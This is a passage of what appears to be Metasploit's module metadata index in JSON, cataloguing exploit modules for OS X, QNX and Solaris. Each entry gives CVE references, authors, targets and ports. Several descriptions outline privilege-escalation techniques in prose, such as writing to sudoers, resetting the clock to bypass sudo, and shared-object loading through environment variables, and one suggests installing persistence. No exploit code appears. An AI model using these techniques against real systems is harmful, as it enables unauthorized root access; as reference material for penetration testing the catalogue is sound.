"type": "exploit",
"author": [
"Emil Kvarnhammar",
"joev <joev@metasploit.com>"
],
"description": "This module exploits the rootpipe vulnerability and bypasses Apple's initial\n fix for the issue by injecting code into a process with the 'admin.writeconfig'\n entitlement.",
"references": [
"CVE-2015-3673",
"URL-https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9-10.10.3"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/rootpipe_entitlements.rb",
"is_install_path": true,
"ref_name": "osx/local/rootpipe_entitlements",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/rsh_libmalloc": {
"name": "Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",
"full_name": "exploit/osx/local/rsh_libmalloc",
"rank": 300,
"disclosure_date": "2015-10-01",
"type": "exploit",
"author": [
"rebel",
"shandelman116"
],
"description": "This module writes to the sudoers file without root access by exploiting rsh and malloc log files.\n Makes sudo require no password, giving access to su even if root is disabled.\n Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).",
"references": [
"EDB-38371",
"CVE-2015-5889"
],
"platform": "OSX,Python",
"arch": "x64, python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9.5-10.10.5"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/rsh_libmalloc.rb",
"is_install_path": true,
"ref_name": "osx/local/rsh_libmalloc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/setuid_tunnelblick": {
"name": "Setuid Tunnelblick Privilege Escalation",
"full_name": "exploit/osx/local/setuid_tunnelblick",
"rank": 600,
"disclosure_date": "2012-08-11",
"type": "exploit",
"author": [
"Jason A. Donenfeld",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The\n vulnerability exists in the setuid openvpnstart, where an insufficient\n validation of path names allows execution of arbitrary shell scripts as root.\n This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099\n over Mac OS X 10.7.5.",
"references": [
"CVE-2012-3485",
"OSVDB-84706",
"EDB-20443",
"URL-http://blog.zx2c4.com/791"
],
"platform": "OSX",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Tunnelblick 3.2.8 / Mac OS X x86",
"Tunnelblick 3.2.8 / Mac OS X x64"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/setuid_tunnelblick.rb",
"is_install_path": true,
"ref_name": "osx/local/setuid_tunnelblick",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/setuid_viscosity": {
"name": "Viscosity setuid-set ViscosityHelper Privilege Escalation",
"full_name": "exploit/osx/local/setuid_viscosity",
"rank": 600,
"disclosure_date": "2012-08-12",
"type": "exploit",
"author": [
"Jason A. Donenfeld",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The\n vulnerability exists in the setuid ViscosityHelper, where an insufficient\n validation of path names allows execution of arbitrary python code as root.\n This module has been tested successfully on Viscosity 1.4.1 over Mac OS X\n 10.7.5.",
"references": [
"CVE-2012-4284",
"OSVDB-84709",
"EDB-20485",
"URL-http://blog.zx2c4.com/791"
],
"platform": "OSX",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Viscosity 1.4.1 / Mac OS X x86",
"Viscosity 1.4.1 / Mac OS X x64"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/setuid_viscosity.rb",
"is_install_path": true,
"ref_name": "osx/local/setuid_viscosity",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/sudo_password_bypass": {
"name": "Mac OS X Sudo Password Bypass",
"full_name": "exploit/osx/local/sudo_password_bypass",
"rank": 300,
"disclosure_date": "2013-02-28",
"type": "exploit",
"author": [
"Todd C. Miller",
"joev <joev@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module gains a session with root permissions on versions of OS X with\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\n and possibly lower versions.\n\n If your session belongs to a user with Administrative Privileges\n (the user is in the sudoers file and is in the \"admin group\"), and the\n user has ever run the \"sudo\" command, it is possible to become the super\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\n\n This module will fail silently if the user is not an admin, if the user has never\n run the sudo command, or if the admin has locked the Date/Time preferences.\n\n Note: If the user has locked the Date/Time preferences, requests to overwrite\n the system clock will be ignored, and the module will silently fail. However,\n if the \"Require an administrator password to access locked preferences\" setting\n is not enabled, the Date/Time preferences are often unlocked every time the admin\n logs in, so you can install persistence and wait for a chance later.",
"references": [
"CVE-2013-1775",
"OSVDB-90677",
"BID-58203",
"URL-http://www.sudo.ws/sudo/alerts/epoch_ticket.html"
],
"platform": "OSX",
"arch": "x86, x64, cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x86 (Native Payload)",
"Mac OS X x64 (Native Payload)",
"CMD"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/sudo_password_bypass.rb",
"is_install_path": true,
"ref_name": "osx/local/sudo_password_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/tpwn": {
"name": "Mac OS X \"tpwn\" Privilege Escalation",
"full_name": "exploit/osx/local/tpwn",
"rank": 300,
"disclosure_date": "2015-08-16",
"type": "exploit",
"author": [
"qwertyoruiop",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a null pointer dereference in XNU to escalate\n privileges to root.\n\n Tested on 10.10.4 and 10.10.5.",
"references": [
"URL-https://github.com/kpwn/tpwn"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.10.4-10.10.5"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/osx/local/tpwn.rb",
"is_install_path": true,
"ref_name": "osx/local/tpwn",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/vmware_bash_function_root": {
"name": "OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)",
"full_name": "exploit/osx/local/vmware_bash_function_root",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"juken",
"joev <joev@metasploit.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the VMWare Fusion\n application, allowing an unprivileged local user to get root access.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9 Mavericks x64 (Native Payload)"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/vmware_bash_function_root.rb",
"is_install_path": true,
"ref_name": "osx/local/vmware_bash_function_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_osx/mdns/upnp_location": {
"name": "Mac OS X mDNSResponder UPnP Location Overflow",
"full_name": "exploit/osx/mdns/upnp_location",
"rank": 200,
"disclosure_date": "2007-05-25",
"type": "exploit",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "This module exploits a buffer overflow that occurs when processing\n specially crafted requests set to mDNSResponder. All Mac OS X systems\n between version 10.4 and 10.4.9 (without the 2007-005 patch) are\n affected.",
"references": [
"OSVDB-35142",
"CVE-2007-2386",
"BID-24144",
"URL-http://support.apple.com/kb/TA24732"
],
"platform": "OSX",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"10.4.8 x86",
"10.4.0 PPC"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/mdns/upnp_location.rb",
"is_install_path": true,
"ref_name": "osx/mdns/upnp_location",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/misc/ufo_ai": {
"name": "UFO: Alien Invasion IRC Client Buffer Overflow",
"full_name": "exploit/osx/misc/ufo_ai",
"rank": 200,
"disclosure_date": "2009-10-28",
"type": "exploit",
"author": [
"Jason Geffner",
"dookie"
],
"description": "This module exploits a buffer overflow in the IRC client component\n of UFO: Alien Invasion 2.2.1.",
"references": [
"OSVDB-65689",
"EDB-14013"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.5.8 x86, UFOAI 2.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "osx/misc/ufo_ai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/rtsp/quicktime_rtsp_content_type": {
"name": "MacOS X QuickTime RTSP Content-Type Overflow",
"full_name": "exploit/osx/rtsp/quicktime_rtsp_content_type",
"rank": 200,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"unknown"
],
"description": "No module description",
"references": [
"CVE-2007-6166",
"OSVDB-40876",
"BID-26549"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0",
"Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1",
"Mac OS X 10.4.8 x86, QuickTime 7.1.3",
"Mac OS X 10.5.0 x86, QuickTime 7.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb",
"is_install_path": true,
"ref_name": "osx/rtsp/quicktime_rtsp_content_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/osx/samba/lsa_transnames_heap",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the szone_free() to overwrite\n the size() or free() pointer in initial_malloc_zones structure.",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "OSX",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Mac OS X 10.4.x x86 Samba 3.0.10",
"Mac OS X 10.4.x PPC Samba 3.0.10",
"DEBUG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "osx/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/samba/trans2open": {
"name": "Samba trans2open Overflow (Mac OS X PPC)",
"full_name": "exploit/osx/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the bug on Mac OS X PowerPC systems.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "OSX",
"arch": "ppc",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/osx/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "osx/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_qnx/local/ifwatchd_priv_esc": {
"name": "ifwatchd Privilege Escalation",
"full_name": "exploit/qnx/local/ifwatchd_priv_esc",
"rank": 600,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"cenobyte",
"Tim Brown",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n systems by exploiting the ifwatchd suid executable.\n\n ifwatchd allows users to specify scripts to execute using the '-A'\n command line argument; however, it does not drop privileges when\n executing user-supplied scripts, resulting in execution of arbitrary\n commands as root.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"CVE-2014-2533",
"BID-66449",
"EDB-32153",
"URL-http://seclists.org/bugtraq/2014/Mar/66"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
"is_install_path": true,
"ref_name": "qnx/local/ifwatchd_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_qnx/qconn/qconn_exec": {
"name": "QNX qconn Command Execution",
"full_name": "exploit/qnx/qconn/qconn_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"David Odell",
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
"URL-http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html",
"URL-http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
"is_install_path": true,
"ref_name": "qnx/qconn/qconn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/dtspcd/heap_noir": {
"name": "Solaris dtspcd Heap Overflow",
"full_name": "exploit/solaris/dtspcd/heap_noir",
"rank": 500,
"disclosure_date": "2002-07-10",
"type": "exploit",
"author": [
"noir <noir@uberhax0r.net>",
"hdm <x@hdm.io>"
],
"description": "This is a port of noir's dtspcd exploit. This module should\n work against any vulnerable version of Solaris 8 (sparc).\n The original exploit code was published in the book\n Shellcoder's Handbook.",
"references": [
"CVE-2001-0803",
"OSVDB-4503",
"BID-3517",
"URL-http://www.cert.org/advisories/CA-2001-31.html",
"URL-http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip"
],
"platform": "Solaris",
"arch": "sparc",
"rport": 6112,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Solaris 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/dtspcd/heap_noir.rb",
"is_install_path": true,
"ref_name": "solaris/dtspcd/heap_noir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/local/extremeparr_dtappgather_priv_esc": {
"name": "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
"full_name": "exploit/solaris/local/extremeparr_dtappgather_priv_esc",
"rank": 600,
"disclosure_date": "2017-04-24",
"type": "exploit",
"author": [
"Shadow Brokers",
"Hacker Fantastic",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the\n `dtappgather` executable included with Common Desktop Environment (CDE)\n on unpatched Solaris systems prior to Solaris 10u11 which allows users\n to gain root privileges.\n\n dtappgather allows users to create a user-owned directory at any\n location on the filesystem using the `DTUSERSESSION` environment\n variable.\n\n This module creates a directory in `/usr/lib/locale`, writes a shared\n object to the directory, and runs the specified SUID binary with the\n shared object loaded using the `LC_TIME` environment variable.\n\n This module has been tested successfully on:\n\n Solaris 9u7 (09/04) (x86);\n Solaris 10u1 (01/06) (x86);\n Solaris 10u2 (06/06) (x86);\n Solaris 10u4 (08/07) (x86);\n Solaris 10u8 (10/09) (x86);\n Solaris 10u9 (09/10) (x86).",
"references": [
"BID-97774",
"CVE-2017-3622",
"EDB-41871",
"URL-https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh",
"URL-http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
],
"platform": "Solaris,Unix",
"arch": "x86, x64, sparc",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/extremeparr_dtappgather_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"EXTREMEPARR"
]
}
},
"exploit_solaris/local/libnspr_nspr_log_file_priv_esc": {
"name": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation",
"full_name": "exploit/solaris/local/libnspr_nspr_log_file_priv_esc",
"rank": 600,
"disclosure_date": "2006-10-11",
"type": "exploit",
"author": [
"iDefense",
"Marco Ivaldi",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an arbitrary file write vulnerability in the\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\n prior to Solaris 10u3 which allows users to gain root privileges.\n\n libnspr versions prior to 4.6.3 allow users to specify a log file with\n the `NSPR_LOG_FILE` environment variable. The log file is created with\n the privileges of the running process, resulting in privilege escalation\n when used in combination with a SUID executable.\n\n This module writes a shared object to the trusted library directory\n `/usr/lib/secure` and runs the specified SUID binary with the shared\n object loaded using the `LD_LIBRARY_PATH` environment variable.\n\n This module has been tested successfully with libnspr version 4.5.1\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).",
"references": [
"BID-20471",
"CVE-2006-4842",
"EDB-2543",
"EDB-2569",
"EDB-2641",
"URL-https://securitytracker.com/id/1017050",
"URL-https://securitytracker.com/id/1017051",
"URL-https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR",
"URL-http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418",
"URL-http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1"
],
"platform": "Solaris",
"arch": "x86, x64, sparc",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/libnspr_nspr_log_file_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/local/rsh_stack_clash_priv_esc": {
"name": "Solaris RSH Stack Clash Privilege Escalation",
"full_name": "exploit/solaris/local/rsh_stack_clash_priv_esc",
"rank": 400,
"disclosure_date": "2017-06-19",
"type": "exploit",
"author": [
"Qualys Corporation",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in RSH on unpatched Solaris\n systems which allows users to gain root privileges.\n\n The stack guard page on unpatched Solaris systems is of\n insufficient size to prevent collisions between the stack\n and heap memory, aka Stack Clash.\n\n This module uploads and executes Qualys' Solaris_rsh.c exploit,\n which exploits a vulnerability in RSH to bypass the stack guard\n page to write to the stack and create a SUID root shell.\n\n This module has offsets for Solaris versions 11.1 (x86) and\n Solaris 11.3 (x86).\n\n Exploitation will usually complete within a few minutes using\n the default number of worker threads (10). Occasionally,\n exploitation will fail. If the target system is vulnerable,\n usually re-running the exploit will be successful.\n\n This module has been tested successfully on Solaris 11.1 (x86)\n and Solaris 11.3 (x86).",
"references": [
"BID-99151",
"BID-99153",
"CVE-2017-1000364",
"CVE-2017-3629",
"CVE-2017-3630",
"CVE-2017-3631",
"EDB-42270",
"URL-http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html",
"URL-https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash",
"URL-https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt"
],
"platform": "Unix",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Solaris 11.1",
"Solaris 11.3"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb",
"is_install_path": true,
"ref_name": "solaris/local/rsh_stack_clash_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Stack Clash",
"Solaris_rsh.c"
]
}
},
"exploit_solaris/lpd/sendmail_exec": {
"name": "Solaris LPD Command Execution",
"full_name": "exploit/solaris/lpd/sendmail_exec",
"rank": 600,
"disclosure_date": "2001-08-31",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"ddz <ddz@theta44.org>"
],
"description": "This module exploits an arbitrary command execution flaw in\n the in.lpd service shipped with all versions of Sun Solaris\n up to and including 8.0. This module uses a technique\n discovered by Dino Dai Zovi to exploit the flaw without\n needing to know the resolved name of the attacking system.",
"references": [
"CVE-2001-1583",
"OSVDB-15131",
"BID-3274"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/lpd/sendmail_exec.rb",
"is_install_path": true,
"ref_name": "solaris/lpd/sendmail_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/solaris/samba/lsa_transnames_heap",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the TALLOC chunk overwrite\n method (credit Ramon and Adriano), which only works with Samba\n versions 3.0.21-3.0.24. Additionally, this module will not work\n when the Samba \"log level\" parameter is higher than \"2\".",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "Solaris",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Solaris 8/9/10 x86 Samba 3.0.21-3.0.24",
"Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24",
"DEBUG"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "solaris/samba/lsa_transnames_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/samba/trans2open": {
"name": "Samba trans2open Overflow (Solaris SPARC)",
"full_name": "exploit/solaris/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on Solaris SPARC systems that do not\n have the noexec stack option set. Big thanks to MC and\n valsmith for resolving a problem with the beta version of\n this module.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "Solaris",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce",
"Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/solaris/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "solaris/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/sadmind_adm_build_path": {
"name": "Sun Solaris sadmind adm_build_path() Buffer Overflow",
"full_name": "exploit/solaris/sunrpc/sadmind_adm_build_path",
"rank": 500,
"disclosure_date": "2008-10-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a buffer overflow vulnerability in adm_build_path()\n function of sadmind daemon.\n\n The distributed system administration daemon (sadmind) is the daemon used by\n Solstice AdminSuite applications to perform distributed system administration\n operations.\n\n The sadmind daemon is started automatically by the inetd daemon whenever a\n request to invoke an operation is received. The sadmind daemon process\n continues to run for 15 minutes after the last request is completed, unless a\n different idle-time is specified with the -i command line option. The sadmind\n daemon may be started independently from the command line, for example, at\n system boot time. In this case, the -i option has no effect; sadmind continues\n to run, even if there are no active requests.",
"references": [
"CVE-2008-4556",
"OSVDB-49111",
"URL-http://risesecurity.org/advisories/RISE-2008001.txt"
],
"platform": "Solaris",
"arch": "x86",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sun Solaris 9 x86 Brute Force",
"Sun Solaris 9 x86",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/sadmind_adm_build_path",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/sadmind_exec": {
"name": "Solaris sadmind Command Execution",
"full_name": "exploit/solaris/sunrpc/sadmind_exec",
"rank": 600,
"disclosure_date": "2003-09-13",
"type": "exploit",
"author": [
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>",
"midnitesnake"
],
"description": "This exploit targets a weakness in the default security\n settings of the sadmind RPC application. This server is\n installed and enabled by default on most versions of the\n Solaris operating system.\n\n Vulnerable systems include solaris 2.7, 8, and 9",
"references": [
"CVE-2003-0722",
"OSVDB-4585",
"BID-8615"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/sadmind_exec.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/sadmind_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/sunrpc/ypupdated_exec": {
"name": "Solaris ypupdated Command Execution",
"full_name": "exploit/solaris/sunrpc/ypupdated_exec",
"rank": 600,
"disclosure_date": "1994-12-12",
"type": "exploit",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "This exploit targets a weakness in the way the ypupdated RPC\n application uses the command shell when handling a MAP UPDATE\n request. Extra commands may be launched through this command\n shell, which runs as root on the remote host, by passing\n commands in the format '|<command>'.\n\n Vulnerable systems include Solaris 2.7, 8, 9, and 10, when\n ypupdated is started with the '-i' command-line option.",
"references": [
"CVE-1999-0209",
"OSVDB-11517",
"BID-1749"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/solaris/sunrpc/ypupdated_exec.rb",
"is_install_path": true,
"ref_name": "solaris/sunrpc/ypupdated_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_solaris/telnet/fuser": {
"name": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability",
"full_name": "exploit/solaris/telnet/fuser",
"rank": 600,
"disclosure_date": "2007-02-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits the argument injection vulnerability\n in the telnet daemon (in.telnetd) of Solaris 10 and 11.",
"references": [
"CVE-2007-0882",
"OSVDB-31881",
"BID-22512"
],
"platform": "Solaris,Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/solaris/telnet/fuser.rb",
"is_install_path": true,
"ref_name": "solaris/telnet/fuser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_solaris/telnet/ttyprompt": {
"name": "Solaris in.telnetd TTYPROMPT Buffer Overflow",
"full_name": "exploit/solaris/telnet/ttyprompt",
"rank": 600,
"disclosure_date": "2002-01-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module uses a buffer overflow in the Solaris 'login'\n application to bypass authentication in the telnet daemon.",
"references": [
"CVE-2001-0797",
"OSVDB-690",
"BID-5531"
],
"platform": "Solaris,Unix",
"arch": "cmd",
